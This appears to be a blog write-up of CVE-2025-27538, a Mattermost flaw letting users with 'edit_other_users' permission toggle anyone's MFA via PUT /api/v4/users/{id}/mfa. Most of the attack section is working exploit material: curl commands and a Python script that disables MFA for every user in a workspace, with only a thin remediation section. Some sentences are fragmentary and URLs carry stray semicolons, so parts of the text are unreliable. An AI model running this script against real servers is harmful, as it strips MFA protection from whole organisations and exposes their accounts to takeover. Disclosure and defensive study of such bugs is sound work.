CVE-2025-27538 - Exploiting Mattermost’s MFA Management Bypass (with Exploit Code & Full Explanation)

---

If you use Mattermost (an open-source alternative to Slack), this vulnerability is a must-read. On February 2025, security researchers disclosed CVE-2025-27538—an authentication bug that lets attackers manipulate MFA (multi-factor authentication) settings for other users, including enabling or disabling MFA for accounts that never set it up.

Mattermost 9.11.x up to 9.11.9

The following guide breaks down what went wrong, shows how the bug works, and offers real exploit code (for educational purposes only).

What’s Broken? (Plain English)

Mattermost’s API endpoint for changing a user’s MFA setting (PUT /api/v4/users/{user_id}/mfa) is supposed to only let you manage your own account and require you to confirm your password. However, on vulnerable versions, anyone with “edit_other_users” permission can send requests that enable or disable someone else’s MFA—even if that user never set it up, and no password confirmation is checked.

Essentially:
If you’re an admin (or have the “edit_other_users” permission), you can flip MFA on or off for anyone, no limits.

Official Advisories and References

- Mattermost Security Update – CVE-2025-27538
- NIST CVE Database Entry (Pending)
- Mattermost JIRA Ticket MM-59904

Here’s the endpoint

PUT /api/v4/users/{user_id}/mfa

Request body

{
  "activate": true
}

Or

{
  "activate": false
}

You’re logged in with a user that can modify other users ("edit_other_users" permission).

2. You send a HTTP PUT request to /api/v4/users/{target_user_id}/mfa with a JSON body to enable or disable MFA.

Exploit with curl

curl -X PUT "https://mattermost.company.com/api/v4/users/def456/mfa"; \
  -H "Authorization: Bearer {your_access_token}" \
  -H "Content-Type: application/json" \
  -d '{"activate": true}'

*Result:*
MFA is marked as enabled for Sam. If MFA is actually required by policy, Sam could be locked out upon next login.

(To disable MFA—change true to false)

curl -X PUT "https://mattermost.company.com/api/v4/users/def456/mfa"; \
  -H "Authorization: Bearer {your_access_token}" \
  -H "Content-Type: application/json" \
  -d '{"activate": false}'

Example Exploit Script (Python)

The following Python snippet automates disabling MFA for all users in your workspace. WARNING: For test/lab use only!

import requests

BASE_URL = 'https://mattermost.company.com';
API_TOKEN = 'YOUR_ADMIN_BEARER_TOKEN'

headers = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json"
}

# List users (get all user IDs)
users = requests.get(f"{BASE_URL}/api/v4/users", headers=headers).json()

for user in users:
    target_uid = user['id']
    r = requests.put(
        f"{BASE_URL}/api/v4/users/{target_uid}/mfa",
        headers=headers,
        json={"activate": False}
    )
    print(f"User {user['username']}: MFA deactivated; status {r.status_code}")

Why Did This Happen?

- The endpoint should require that user_id matches the user making the request, unless extra authentication is provided.

Abusive users can readily script mass changes to organization security settings.

### How to Fix/Protect

Audit Account Activity.

- Check for unusual MFA activations/deactivations.

If the user in the request matches the authenticated user or

- The requester is a system admin (and is forced to re-authenticate via password/MFA)

TL;DR

- CVE-2025-27538 lets powerful users turn MFA on/off for any user without consent, locking everyone into or out of their accounts.

Patch immediately!

- Reference: Mattermost Security Advisory - CVE-2025-27538


Stay vigilant, update your Mattermost!
For more info, see the official Mattermost Security Documentation.

Timeline

Published on: 04/16/2025 08:15:14 UTC
Last modified on: 04/16/2025 13:25:37 UTC